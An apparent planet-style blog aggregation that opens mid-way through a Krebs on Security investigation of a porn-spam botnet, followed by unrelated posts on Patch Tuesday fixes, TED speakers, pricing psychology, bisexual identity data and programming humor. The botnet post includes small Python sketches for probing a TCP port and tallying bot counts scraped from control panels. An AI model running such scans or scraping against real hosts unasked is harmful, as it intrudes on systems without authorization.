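The per-address probe itself is nothing more than a TCP connect to port 10001, which is what the Nmap scan boiled down to. A self-contained Python sketch of that check — demonstrated against a throwaway local listener so that nothing real is scanned:

```python
import socket

def port_open(host, port=10001, timeout=3.0):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Demo against a local listener on an OS-assigned ephemeral port:
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
demo_port = listener.getsockname()[1]
print(port_open("127.0.0.1", demo_port))  # → True
listener.close()
```

In the real research, feeding the name-server IP list through a check like this (or Nmap) showed every one of them listening on port 10001.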

Here’s the output of one controller that’s currently getting pinged by more than 12,000 systems configured to relay porn spam (the relevant part is the first bit on the second line below — “current activebots=”). Currently, the entire botnet (counting the active bots from all working bot panels) seems to hover around 80,000 systems.

Screenshot: output from one of the live botnet reporting panels.
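Tallying the whole botnet from the panels is then just a matter of scraping that one field from each page. A sketch assuming the literal “current activebots=” wording shown in the panel output (the sample page texts below are invented):

```python
import re

ACTIVEBOTS = re.compile(r"current activebots=(\d+)")

def total_active_bots(panel_pages):
    """Sum the 'current activebots=' counter across a list of panel page texts."""
    total = 0
    for text in panel_pages:
        m = ACTIVEBOTS.search(text)
        if m:
            total += int(m.group(1))
    return total

pages = ["uptime=992\ncurrent activebots=12034 relays ok",
         "current activebots=4550 relays ok"]
print(total_active_bots(pages))  # → 16584
```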

At the time, the spam being relayed through these systems was advertising sites that tried to get visitors to sign up for online chat and dating sites apparently affiliated with Deniro Marketing and CyberErotica.

Seeking more information, I began searching the Web for information about CyberErotica’s affiliate offerings and I found that the affiliate program’s marketing division is run by a guy who uses the email address scott@cecash.com.

A Google search quickly reveals that scott@cecash.com also advertises he can be reached using the ICQ instant messenger address of 55687349. I checked icq.com’s member lookup page, and found the name attached to ICQ# 55687349 is “Scott Philips.”

Mr. Philips didn’t return messages seeking comment. But I couldn’t help wondering about the similarity between that name and that of a convicted Australian porn spammer named Scott Phillips (NB: two “l”s in Phillips).

In 2010, Scott Gregory Phillips was fined AUD $2 million for running a business that employed people to create fake profiles on dating websites in a bid to obtain the mobile phone numbers of dating website users. Phillips’ operation then sent SMS texts such as “get laid, text your number to…”, and then charged $5 on the mobile accounts of people who replied.

Phillips’ Facebook page and Quora profile would have us believe he has turned his life around and is now making a living through day trading. Reached via email, Phillips said he is a loyal reader who long ago quit the spam business.

“I haven’t been in the spam business since 2002 or so,” Phillips said. “I did some SMS spam in 2005, got about 18 million bucks worth of fines for it, and went straight.”

Phillips says he builds “automated commodity trading systems” now, and that virtually all modern spam is botnet-based.

“As far as I know the spam industry is 100% botnet these days, and not a viable proposition for adult sites,” he told KrebsOnSecurity.

Well, it’s certainly a viable proposition for some spammer. The most frustrating aspect of this research is that, in spite of the virtually non-existent operational security employed by whoever built this particular crime machine, I still have no real data on how the botnet is being built, what type of malicious software may be involved, or who’s responsible.

If anyone has additional research or information on this botnet, please don’t hesitate to leave a comment below or get in touch with me directly.

Cory DoctorowTalking about contestable futures on the Imaginary Worlds podcast

I’m in the latest episode of Imaginary Worlds, “Imagining the Internet” (MP3), talking about the future as a contestable place that we can’t predict, but that we can influence.


We were promised flying cars and we got Twitter instead. That’s the common complaint against sci-fi authors. But some writers did imagine the telecommunications that changed our world for better or worse. Cory Doctorow, Ada Palmer, Jo Walton and Arizona State University professor Ed Finn look at the cyberpunks and their predecessors. And artist Paul St George talks about why he’s fascinated by a Skype-like machine from the Victorian era.

CryptogramMillennials and Secret Leaking

I hesitate to blog this, because it's an example of everything that's wrong with pop psychology. Malcolm Harris writes about millennials, and has a theory of why millennials leak secrets. My guess is that you could write a similar essay about every named generation, every age group, and so on.

Worse Than FailureCodeSOD: Classic WTF: Hacker Proof Booleans

We continue our summer break with a classic case of outsmarting oneself in the stupidest way. Original -- Remy

"Years ago, long before I'd actually started programming, I spent my time learning about computers and data concepts by messing around with, believe it or not, cheat devices for video games," wrote Rena K. "The one I used primarily provided a RAM editor and some other tools which allowed me to tool around with the internal game files, and I even got into muddling around with the game data, all in the interest of seeing what would happen."

"As such, by the time my inflated hacker ego and I got into programming professionally, I was already pretty familiar with basic things like data types and binary. I was feeling pretty darn L33T."

"However, this mindset led me to think that someone could potentially 'steal my program' by replacing my name with theirs in a hex editor and claiming to have made it themselves. (Which wasn't unheard of in the little game hacking communities I was in...) So I used the h4x0r sk1llz I'd picked up to make my program hacker-proof."

"Of course I knew full well how boolean variables worked, but I'd read somewhere that in VB6, boolean types were actually integers. From this, I concluded that it was technically possible for a boolean variable to hold a value that was neither true nor false. Of course, there was no way to do this from within VB, so it could only mean someone was monkeying around with something they shouldn't. I needed a way to detect this."

If var = True Then
    doThings
ElseIf var = False Then
    doOtherThings
Else
    MsgBox "omfg haxor alert"
    End ' terminate program
End If

"I kept up adding the above to my code for years until I grew up enough to realize that it didn't do a darn thing. For the record though, nobody ever managed to 'steal my program'."


Do you have any confessions you'd like to make? Send them on in.


,

CryptogramData vs. Analysis in Counterterrorism

This article argues that Britain's counterterrorism problem isn't lack of data, it's lack of analysis.

Cory DoctorowHow to get a signed, personalized copy of Walkaway sent to your door!


The main body of the tour for my novel Walkaway is done (though there are still upcoming stops at Denver Comic-Con, San Diego Comic-Con, the Burbank Public Library and Defcon in Las Vegas), but you can still get signed, personalized copies of Walkaway!

My local, fantastic indie bookstore, Dark Delicacies, has a good supply of Walkaways, and since I pass by it most days, they’ve generously offered to take special orders for me to stop in and personalize so they can ship them anywhere in the world.

You can reach them at +1 818-556-6660, or darkdel@darkdel.com.

Sociological Images“Luxury” versus “discount” pricing and the meaning of the number 9

I discovered a nice gem of an insight this week in an article called The 11 Ways That Consumers Are Hopeless at Math: the symbolism of the number 9.

We’re all familiar with the convention of pricing items one penny below a round number: $1.99 instead of $2.00, $39.99 instead of $40.00, etc. Psychologically, marketers know that this works. We’re more likely to buy something at $89.99 than we are at $90.00.

It’s not, though, because we are tricked by that extra penny in our pockets. It’s because, so argues Derek Thompson, the .99 symbolizes “discount.” It is more than just a number; it has a meaning. It now says to us not just 9, but also You are getting a deal. It doesn’t matter if it’s a carton of eggs for $2.99 or a dishwasher for $299.99. In both cases, putting two 9s at the end makes us feel like smart shoppers.

To bring this point home, in those moments when we’re not looking for a deal, the number 9 has the opposite effect. When marketers want to sell a “luxury” item, they generally don’t use the 9s; they simply state the round-number price. The whole point of buying a luxury item is to spend a lot of money because you have the money to spend. It shouldn’t feel like a deal; it should feel like an indulgence. Thompson uses the example of lobster at a high-end restaurant. They don’t sell it to you for $99.99; that looks cheap. They ask you for $100. And, if you’ve got the money and you’re in the mood, it feels good precisely because there are no 9s.

Definitely no 9s:

Photo by artjour street art flickr creative commons.

Not yet convinced? Consider this price tag for a flat-screen television: originally priced at $2,300.00, now discounted to $1,999.99. Suddenly it’s on sale, with a whole lot of 9s:

Photo by Paul Swansen flickr creative commons; cropped.
Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureClassic WTF: The Accidental Hire

At least we get a summer break, I suppose. Not like over at Doghouse Insurance. Original -- Remy

Doghouse Insurance (as we'll call them) was not a pleasant place to work. Despite being a very successful player in their industry, the atmosphere inside Doghouse was filled with a constant, frenzied panic. If Joe Developer didn't delay his upcoming vacation and put in those weekend hours, he might risk the timely delivery of his team's module, which might risk delaying the entire project, which might risk the company's earnings potential, which might risk the collapse of the global economy. And that's just for the Employee Password Change Webpage project; I can't even begin to fathom the overarching devastation that would ensue from a delayed critical project.

To make matters worse, the primary business application that poor souls like Vinny maintained was a complete nightmare. It was developed during the company's "database simplification" era and consisted of hundreds of different "virtual attribute tables" stuffed into four real tables; it was a classic case of The Inner-Platform Effect. But amidst all this gloom and despair was an upbeat fellow named Chris who accidentally became a part of the Doghouse Insurance team.

Chris interviewed with Doghouse Insurance back in 2002 for a developer position on the Data Warehouse team. With the large pool of available candidates at the time, Chris didn't make the cut and the opening was awarded to someone else. However, Doghouse never communicated this to him and instead offered him a job.

It was an awkward first day; Chris showed up and no one knew what to do with him. They obviously couldn't immediately fire him (it would risk a lawsuit, which might risk a -- oh, you know the drill) and, since all teams were short-staffed, they couldn't increase the headcount on one team because that would be unfair to all of the other managers. After a few weeks, it was finally decided: Chris would be the Source Control Guy.

Doghouse Insurance didn't really have a need for a Source Control Guy and Chris didn't really have any experience being a Source Control Guy. It was a perfect match. After a few months, Chris figured out how to manage Doghouse's Source Control System and became responsible for the entirety of SCS-related tasks: adding new users, resetting forgotten passwords, creating new repositories, and -- well -- that was pretty much it.

While everyone else stressed out and practically killed themselves over deadlines, Chris mostly sat around all day, waiting for that occasional "I forgot my source control password" email. He never gloated nor complained and instead made himself available to listen to his coworkers' grievances and tales of woe. Chris would offer up whatever advice he could and would generally lighten the mood of anyone who stopped by his desk for a chat. His cubicle became the sole oasis of sanity in the frantic world of Doghouse Insurance.

Although Vinny is no longer at Doghouse Insurance (he actually left after following Chris' advice), he still does keep in touch with Chris. And Vinny is happy to report that, should you ever find yourself unfortunate enough to work at Doghouse Insurance, you can still find Chris there, managing the Source Control System and eager to chat about the insanity that is Doghouse.


,

Krebs on SecurityMicrosoft, Adobe Ship Critical Fixes

Microsoft today released security updates to fix almost a hundred flaws in its various Windows operating systems and related software. One bug is so serious that Microsoft is issuing patches for it on Windows XP and other operating systems the company no longer officially supports. Separately, Adobe has pushed critical updates for its Flash and Shockwave players, two programs most users would probably be better off without.

According to security firm Qualys, 27 of the 94 security holes Microsoft patches with today’s release can be exploited remotely by malware or miscreants to seize complete control over vulnerable systems with little or no interaction on the part of the user.

Microsoft this month is fixing another serious flaw (CVE-2017-8543) present in most versions of Windows that resides in the feature of the operating system which handles file and printer sharing (also known as “Server Message Block” or the SMB service).

SMB vulnerabilities can be extremely dangerous if left unpatched on a local (internal) corporate network. That’s because a single piece of malware that exploits this SMB flaw within a network could be used to replicate itself to all vulnerable systems very quickly.

It is this very “wormlike” capability — a flaw in Microsoft’s SMB service — that was harnessed for spreading by WannaCry, the global ransomware contagion last month that held files for ransom at countless organizations and shut down at least 16 hospitals in the United Kingdom.

According to Microsoft, this newer SMB flaw is already being exploited in the wild. The vulnerability affects Windows Server 2016, 2012, 2008 as well as desktop systems like Windows 10, 7 and 8.1.

The SMB flaw — like the one that WannaCry leveraged — also affects older, unsupported versions of Windows such as Windows XP and Windows Server 2003. And, as with that SMB flaw, Microsoft has made the unusual decision to make fixes for this newer SMB bug available for those older versions. Users running XP or Server 2003 can get the update for this flaw here.

“Our decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,” wrote Eric Doerr, general manager of Microsoft’s Security Response Center.

“Based on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly,” Doerr wrote. “As always, we recommend customers upgrade to the latest platforms. The best protection is to be on a modern, up-to-date system that incorporates the latest defense-in-depth innovations. Older systems, even if fully up-to-date, lack the latest security features and advancements.”

The default browsers on Windows — Internet Explorer or Edge — get their usual slew of updates this month for many of these critical, remotely exploitable bugs. Qualys says organizations using Microsoft Outlook should pay special attention to a newly patched bug in the popular mail program because attackers can send malicious email and take complete control over the recipient’s Windows machine when users merely view a specially crafted email in Outlook.

Separately, Adobe has issued updates to fix critical security problems with both its Flash Player and Shockwave Player. If you have Shockwave installed, please consider removing it now.

For starters, hardly any sites require this plugin to view content. More importantly, Adobe has a history of patching Shockwave’s built-in version of Flash several versions behind the stand-alone Flash plugin version. As a result Shockwave has been a high security risk to have installed for many years now. For more on this trend, see Why You Should Ditch Adobe Shockwave.

Same goes for Adobe Flash Player, which most users can probably do without these days, enabling it only in the rare instance that it’s required. I recommend that users who have an affirmative need for Flash leave it disabled until that need arises. Otherwise, get rid of it.

Adobe patches dangerous new Flash flaws all the time, and Flash bugs are still the most frequently exploited by exploit kits — malware booby traps that get stitched into the fabric of hacked and malicious Web sites so that visiting browsers running vulnerable versions of Flash get automatically seeded with malware.

For some ideas about how to hobble or do without Flash (as well as slightly less radical solutions) check out A Month Without Adobe Flash Player.

If you choose to keep Flash, please update it today to version 26.0.0.126. The most recent versions of Flash should be available from the Flash home page. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

Chrome and IE should auto-install the latest Flash version on browser restart, though users may need to manually check for updates or restart the browser to get it. When in doubt, click the vertical three-dot icon to the right of the URL bar, select “Help,” then “About Chrome”: if there is an update available, Chrome should install it then.

As always, if you experience any issues downloading or installing any of these updates, please leave a note about it in the comments below.

Update, May 16, 10:38 a.m. ET: Microsoft has revised its bulletin on the vulnerability for which it issued Windows XP fixes (CVE-2017-8543) to clarify that the problem fixed by the patch is in the Windows Search service, not the SMB service as Microsoft previously stated in the bulletin. The original bulletin from Microsoft’s Security Response Center incorrectly stated that SMB was part of this vulnerability; rather, it has nothing to do with this vulnerability and was not patched. The vulnerability is in Windows Search only. I’m mentioning it here because a Windows user or admin thinking that turning off or blocking SMB would stop all vectors to this attack would be wrong and still vulnerable without the patch. All an attacker needs to do is get some code to talk to Windows Search in a malformed way — even locally — to exploit this Windows Search flaw.

TEDSneak preview lineup unveiled for Africa’s next TED Conference

On August 27, an extraordinary group of people will gather in Arusha, Tanzania, for TEDGlobal 2017, a four-day TED Conference for “those with a genuine interest in the betterment of the continent,” says curator Emeka Okafor.

As Okafor puts it: “Africa has an opportunity to reframe the future of work, cultural production, entrepreneurship, agribusiness. We are witnessing the emergence of new educational and civic models. But there is, on the flip side, a set of looming challenges that include the youth bulge and under-/unemployment, a food crisis, a risky dependency on commodities, slow industrializations, fledgling and fragile political systems. There is a need for a greater sense of urgency.”

He hopes the speakers at TEDGlobal will catalyze discussion around “the need to recognize and amplify solutions from within Africa and the global diaspora.”

Who are these TED speakers? A group of people with “fresh, unique perspectives in their initiatives, pronouncements and work,” Okafor says. “Doers as well as thinkers — and contrarians in some cases.” The curation team, which includes TED head curator Chris Anderson, went looking for speakers who take “a hands-on approach to solution implementation, with global-level thinking.”

Here’s the first sneak preview — a shortlist of speakers who, taken together, give a sense of the breadth and topics to expect, from tech to the arts to committed activism and leadership. Look for the long list of 35–40 speakers in upcoming weeks.

The TEDGlobal 2017 conference happens August 27–30, 2017, in Arusha, Tanzania. Apply to attend >>

Kamau Gachigi, Maker

“In five to ten years, Kenya will truly have a national innovation system, i.e. a system that by its design audits its population for talented makers and engineers and ensures that their skills become a boon to the economy and society.” — Kamau Gachigi on Engineering for Change

Dr. Kamau Gachigi is the executive director of Gearbox, Kenya’s first open makerspace for rapid prototyping, based in Nairobi. Before establishing Gearbox, Gachigi headed the University of Nairobi’s Science and Technology Park, where he founded a Fab Lab full of manufacturing and prototyping tools in 2009, then built another one at the Riruta Satellite in an impoverished neighborhood in the city. At Gearbox, he empowers Kenya’s next generation of creators to build their visions. @kamaufablab

Mohammed Dewji, Business leader

“My vision is to facilitate the development of a poverty-free Tanzania. A future where the opportunities for Tanzanians are limitless.” — Mohammed Dewji

Mohammed Dewji is a Tanzanian businessman, entrepreneur, philanthropist, and former politician. He serves as the President and CEO of MeTL Group, a Tanzanian conglomerate operating in 11 African countries. The Group operates in areas as diverse as trading, agriculture, manufacturing, energy and petroleum, financial services, mobile telephony, infrastructure and real estate, transport, logistics and distribution. He served as Member of Parliament for Singida-Urban from 2005 until his retirement in 2015. Dewji is also the Founder and Trustee of the Mo Dewji Foundation, focused on health, education and community development across Tanzania. @moodewji

Meron Estefanos, Refugee activist

“Q: What’s a project you would like to move forward at TEDGlobal?
A: Bringing change to Eritrea.” —Meron Estefanos

Meron Estefanos is an Eritrean human rights activist, and the host and presenter of Radio Erena’s weekly program “Voices of Eritrean Refugees,” aired from Paris. Estefanos is executive director of the Eritrean Initiative on Refugee Rights (EIRR), advocating for the rights of Eritrean refugees, victims of trafficking, and victims of torture. Ms Estefanos has been key in identifying victims throughout the world who have been blackmailed to pay ransom for kidnapped family members, and was a key witness in the first trial in Europe to target such blackmailers. She is co-author of Human Trafficking in the Sinai: Refugees between Life and Death and The Human Trafficking Cycle: Sinai and Beyond, and was featured in the film Sound of Torture. She was nominated for the 2014 Raoul Wallenberg Award for her work on human rights and victims of trafficking. @meronina

Touria El Glaoui, Art fair founder

“I’m looking forward to discussing the roles we play as leaders and tributaries in redressing disparities within arts ecosystems. The art fair is one model which has had a direct effect on the ways in which audiences engage with art, and its global outlook has contributed to a highly mobile and dynamic means of interaction.” — Touria El Glaoui

Touria El Glaoui is the founding director of the 1:54 Contemporary African Art Fair, which takes place in London and New York every year and, in 2018, launches in Marrakech. The fair highlights work from artists and galleries across Africa and the diaspora, bringing visibility in global art markets to vital upcoming visions. El Glaoui began her career in the banking industry before founding 1:54 in 2013. Parallel to her career, Touria has organised and co-curated exhibitions of her father’s work, the Moroccan artist Hassan El Glaoui, in London and Morocco. @154artfair

Gus Casely-Hayford, Historian

“Technological, demographic, economic and environmental change are recasting the world profoundly and rapidly. The sentiment that we are traveling through unprecedented times has left many feeling deeply unsettled, but there may well be lessons to learn from history — particularly African history — lessons that show how brilliant leadership and strategic intervention have galvanised and united peoples around inspirational ideas.” — Gus Casely-Hayford

Dr. Gus Casely-Hayford is a curator and cultural historian who writes, lectures and broadcasts widely on African culture. He has presented two series of The Lost Kingdoms of Africa for the BBC and has lectured widely on African art and culture, advising national and international bodies on heritage and culture. He is currently developing a National Portrait Gallery exhibition that will tell the story of abolition of slavery through 18th- and 19th-century portraits — an opportunity to bring many of the most important paintings of black figures together in Britain for the first time.

Oshiorenoya Agabi, Computational neuroscientist

“Koniku eventually aims to build a device that is capable of thinking in the biological sense, like a human being. We think we can do this in the next two to five years.” — Oshiorenoya Agabi on IndieBio.co

With his startup Koniku, Oshiorenoya Agabi is working to integrate biological neurons and silicon computer chips, to build computers that can think like humans can. Faster, cleverer computer chips are key to solving the next big batch of computing problems, like particle detection or sophisticated climate modeling — and to get there, we need to move beyond the limitations of silicon, Agabi believes. Born and raised in Lagos, Nigeria, Agabi is now based in the SF Bay Area, where he and his lab mates are working on the puzzle of connecting silicon to biological systems.

Natsai Audrey Chieza, Design researcher

Photo: Natsai Audrey Chieza

Natsai Audrey Chieza is a design researcher whose fascinating work crosses boundaries between technology, biology, design and cultural studies. She is founder and creative director of Faber Futures, a creative R&D studio that conceptualises, prototypes and evaluates the resilience of biomaterials emerging through the convergence of bio-fabrication, digital fabrication and traditional craft processes. As Resident Designer at the Department of Biochemical Engineering, University College London, she established a design-led microbiology protocol that replaces synthetic pigments with natural dyes excreted by bacteria — producing silk scarves dyed brilliant blues, reds and pinks. The process demands a rethink of the entire system of fashion and textile production — and is also a way to examine issues like resource scarcity, provenance and cultural specificity. @natsaiaudrey

Stay tuned for more amazing speakers, including leaders, creators, and more than a few truth-tellers … learn more >>


CryptogramSecurity Flaws in 4G VoLTE

Research paper: "Subscribers remote geolocation and tracking using 4G VoLTE enabled Android phone," by Patrick Ventuzelo, Olivier Le Moal, and Thomas Coudray.

Abstract: VoLTE (Voice over LTE) is a technology implemented by many operators over the world. Unlike previous 2G/3G technologies, VoLTE offers the possibility to use the end-to-end IP networks to handle voice communications. This technology uses VoIP (Voice over IP) standards over IMS (IP Multimedia Subsystem) networks. In this paper, we will first introduce the basics of VoLTE technology. We will then demonstrate how to use an Android phone to communicate with VoLTE networks and what normal VoLTE communications look like. Finally, we will describe different issues and implementations' problems. We will present vulnerabilities, both passive and active, and attacks that can be done using VoLTE Android smartphones to attack subscribers and operators' infrastructures. Some of these vulnerabilities are new and not previously disclosed: they may allow an attacker to silently retrieve private pieces of information on targeted subscribers, such as their geolocation.

News article. Slashdot thread.

Worse Than FailureCodeSOD: Classic WTF: It's Like Calling Assert

We continue our summer vacation with this gem: a unique way to interact with structured exception handling, to be sure. Original. --Remy

When we go from language to language and platform to platform, a whole lot of “little things” change about how we write code: typing, syntax, error handling, etc. Good developers try to adapt to a new language by reading the documentation, asking experienced colleagues, and trying to follow best practices. “Certain Developers,” however, try to make the language adapt to their way of doing things.

Adrien Kunysz discovered the following code, written by a “Certain Developer” who wasn’t a fan of the try/catch/finally approach to exception handling called for in Java development.

   /**
    * Like calling assert(false) in C.
    */
   protected final void BUG (String msg) {
       Exception e = null;
       try { throw new Exception (); } catch (Exception c) { e = c; }
       logger.fatal (msg, e);
       System.exit (1);
   }

And I’m sure that, by commenting “Like calling assert(false) in C,” the author doesn’t mean assert.h, but means my_assert.h. After all, who is C – or any other language – to tell him how errors should be handled?
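For contrast, here is a minimal sketch of why the throw/catch dance is pointless (my own illustration, not code from the original submission): a Java Throwable captures its stack trace when it is constructed, so you can hand a freshly constructed exception to a logger without ever throwing it.

```java
// Sketch only: demonstrates that "new Exception()" already records the
// stack trace at construction time, so throwing and immediately catching
// it (as BUG() does) adds nothing.
public class BugDemo {
    // hypothetical replacement for BUG(); logger.fatal is stubbed with stderr
    static void bug(String msg) {
        new Exception(msg).printStackTrace(); // full stack trace, no throw needed
        // a real version would call System.exit(1) here
    }

    public static void main(String[] args) {
        Exception e = new Exception("never thrown");
        // the trace exists even though the exception was never thrown
        if (e.getStackTrace().length == 0) {
            throw new AssertionError("expected a captured stack trace");
        }
        bug("demo message");
        System.out.println("ok");
    }
}
```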

UPDATE: Fixed Typos and language. I swear, at 7:00AM this looked fine to me...

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

,

Sociological Images2/3rds of sexual minorities now identify as bisexual, but it depends

Originally posted at Inequality by (Interior) Design.

I’ve been following a couple different data sets that track the size of the LGB(T) population in the United States for a few years. There’s a good amount of evidence that all points in the same direction: those identifying as lesbian, gay, bisexual, and possibly transgender too are all on the rise. Just how large of an increase is subject to a bit of disagreement, but the larger trend is undeniable. Much of the reporting on this shift treats this as a fact that equally blankets the entirety of the U.S. population (or only deals superficially with the really interesting demographic questions concerning the specific groups within the population that account for this change).

In a previous post, I separated the L’s, G’s and B’s because I suspected that more of this shift was accounted for by bisexuals than is often discussed in any critical way (*the GSS does not presently have a question that allows us to separate anyone identifying as transgender or outside the gender binary). Between 2008 and 2016, the proportion of the population identifying as lesbian or gay went from 1.6% to 2.4%. During the same period, those identifying as bisexual jumped from 1.1% to 3.3%. It’s a big shift and it’s even bigger when you look at how pronounced it is among the groups who primarily account for this change: women, people of color, and young people.

The thing about sexual identities though, is that they’re just like other kinds of meaningful identities in that they intersect with other identities in ways that produce different sorts of meanings depending upon what kinds of configurations of identities they happen to be combined with (like age, race, and gender). For instance, as a sexual identity, bisexual is more common than both lesbian and gay combined. But, bisexuality is gendered. Among women, “bisexual” is a more common sexual identity than is “lesbian”; but among men, “gay” is a more common sexual identity than “bisexual”–though this has shifted a bit over the 8 years GSS has been asking questions about sexual orientation. And so too is bisexuality a racialized identity in that the above gendered trend is more true of white and black men than men of other races.

Consider this: between 2008 and 2016, among young people (18-34 years old), those identifying as lesbian or gay went from 2.7% to 3.0%, while those identifying as “bisexual” increased twofold, from 2.6% to 5.3%.  But, look at how this more general change among young people looks when we break it down by gender.
Picture1

Looked at this way, bisexuality as a sexual identity has more than doubled in recent years. Among 18-34 year old women in 2016, the GSS found 8% identifying as bisexual. You have to be careful with GSS data once you start parsing it too finely, as the sample sizes decrease substantially once we break things down by more than gender and age. But, just for fun, I wanted to look into how this trend looked when we examined it among different racial groups (GSS only has codes for white, black, and other).

Picture1

Here, you can see a couple things.  But one of the big stories I see is that “bisexual” identity appears to be particularly absent among Black men in the U.S. And, among young men identifying as a race other than Black or white, bisexuality is a much more common identity than is gay. It’s also true that the proportions of gay and bisexual men in each group appear to jump around year to year.  The general trend follows the larger pattern – toward more sexual minority identities.  But, it’s less straightforward than that when we actually look at the shift among a few specific racial groups within one gender.  Now, look at this trend among women.

Picture1
Here, we clearly see the larger trend that “bisexual” appears to be a more common sexual identity than “lesbian.” But look at Black women: in 2016, just shy of one in five Black women between the ages of 18 and 34 identified as lesbian or bisexual (19%) in the GSS sample! And about two thirds of those women identify as bisexual (12.4%) rather than as lesbian (6.6%). Similarly, and mirroring the larger trend that “bisexual” is more common among women while “gay” is more popular among men, “lesbian” is a noticeably absent identity among women identifying as a race other than Black or white, just as “gay” is less present among men identifying as a race other than Black or white.
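The “two thirds” figure follows directly from the percentages quoted above; here is a quick arithmetic check (using the GSS percentages as reported, not recomputed from microdata):

```python
# Black women aged 18-34 in the 2016 GSS sample (percentages as quoted above)
lesbian = 6.6
bisexual = 12.4

total = lesbian + bisexual     # share identifying as lesbian or bisexual
bi_share = bisexual / total    # fraction of that group identifying as bisexual

print(round(total, 1))     # 19.0 -- "just shy of one in five"
print(round(bi_share, 2))  # 0.65 -- about two thirds
```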

Below is all that information in a single chart.  I felt it was a little less intuitive to read in this form. But this is the combined information from the two graphs preceding this if it’s helpful to see it in one chart.

Picture1

What these shifts mean is a larger question. But it’s one that will require an intersectional lens to interpret. And this matters because bisexuality is a less-discussed sexual identification–so much so that the term “bi erasure” exists to name the ways the legitimacy, or even the existence, of this sexual identity is challenged. As a sexual identification in the U.S., however, “bisexual” is actually more common than “gay” and “lesbian” identifications combined.

And yet, whether bisexual-identifying people will or do see themselves as part of a distinct sexual minority is more of an open question. All of this makes me feel that we need to consider more carefully whether to group bisexuals with lesbian women and gay men when reporting shifts in the LGB population. Whatever is done, we should care about bisexuality (particularly among women), because this is a sexual identification that is becoming much more common than is sometimes recognized.

Tristan Bridges, PhD is a professor at The College at Brockport, SUNY. He is the co-editor of Exploring Masculinities: Identity, Inequality, Continuity, and Change with C.J. Pascoe and studies gender and sexual identity and inequality. You can follow him on Twitter here. Tristan also blogs regularly at Inequality by (Interior) Design.

(View original at https://thesocietypages.org/socimages)

CryptogramHealthcare Industry Cybersecurity Report

New US government report: "Report on Improving Cybersecurity in the Health Care Industry." It's pretty scathing, but nothing in it will surprise regular readers of this blog.

It's worth reading the executive summary, and then skimming the recommendations. Recommendations are in six areas.

The Task Force identified six high-level imperatives by which to organize its recommendations and action items. The imperatives are:

  1. Define and streamline leadership, governance, and expectations for health care industry cybersecurity.

  2. Increase the security and resilience of medical devices and health IT.

  3. Develop the health care workforce capacity necessary to prioritize and ensure cybersecurity awareness and technical capabilities.

  4. Increase health care industry readiness through improved cybersecurity awareness and education.

  5. Identify mechanisms to protect research and development efforts and intellectual property from attacks or exposure.

  6. Improve information sharing of industry threats, weaknesses, and mitigations.

News article.

Slashdot thread.

Worse Than FailureClassic WTF: Server Room Fans and More Server Room Fun

The Daily WTF is taking a short summer break this week, and as the temperatures around here are edging up towards "Oh God I Want to Die" degrees Fahrenheit, I thought it'd be great to kick off this week of classic articles with some broiling hot server room hijinks. -- Remy

"It's that time of year again," Robert Rossegger wrote, "you know, when the underpowered air conditioner just can't cope with the non-winter weather? Fortunately, we have a solution for that... and all we need to do is just keep an extra eye on people walking near the (completely ajar) server room door."

 

"For as long as anyone can remember," Mike E wrote, "the fax machine in one particular office was a bit spotty whenever it was wet out. After having the telco test the lines from the DMARC to the office, I replaced the hardware, looked for water leaks all along the run, and found precisely nothing. The telco disavowed all responsibility, so the best solution I could offer was to tell the users affected by this to look out the window and, if raining, go to another fax machine."

"One day, we had the telco out adding a T1 and they had the cap off of the vault where our cables come in to the building. Being curious by nature, I wandered over when nobody was around and wound up taking this picture. After emailing same to the district manager of the telco, suddenly we had the truck out for an extra day (accompanied by one very sullen technician) and the fax machine worked perfectly from then on."

 

"I found this when I came back in to work after some time off," writes Sam Nicholson, "that drive is actually earmarked for 'off-site backup'. Also, this is what passes for a server rack at this particular software company. Yes, it's made of wood."

 

"Some people use 'proper electrical wiring'," writes Mike, "others use 'extension cords'. We, on the other hand, apparently do this."

 

"I was staying at a hotel in Manhattan and somehow took a wrong turn and wound up in the stairwell," wrote Dan, "not only is all their equipment in a public place (without even a door), it's mostly hanging from cables in several places."

 

"I spotted this in China," writes Matt, "This poor switch was bolted to a column in the middle of some metal shop about 4m above ground. There were many more curious things, but I decided to keep a low profile and stop taking pictures."

 

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

,

Planet Linux AustraliaOpenSTEM: This Week in HASS – term 2, week 9

The OpenSTEM™ Understanding Our World® units have only 9 weeks per term, so this is the last week! Our youngest students are looking at some Aboriginal Places; slightly older students are thinking about what their school and local area were like when their parents and grandparents were children; and students in years 3 to 6 are completing their presentations and anything else that might be outstanding from the term.

Foundation/Prep/Kindy

Students in the stand-alone Foundation/Prep/Kindy class (Unit F.2) examine Aboriginal Places this week. Students examine which places are special to Aboriginal people, and how these places should be cared for by Aboriginal people and the broader community. Several of the Australian places in the Aunt Madge’s Suitcase Activity can be used to support this discussion in the classroom. Students in an integrated Foundation/Prep/Kindy and Year 1 class (Unit F.6), as well as Year 1 (Unit 1.2), 2 (Unit 2.2) and 3 (Unit 3.2) students consider life in the times of their parents and grandparents, with specific reference to their school, or the local area studied during this unit. Teachers may wish to invite older members of the community (including interested parents and/or grandparents) into the class to describe their memories of the area in former years. Were any of them past students of the school? This is a great opportunity for students to come up with their own questions about life in past times.

Years 3 to 6

Aunt Madge

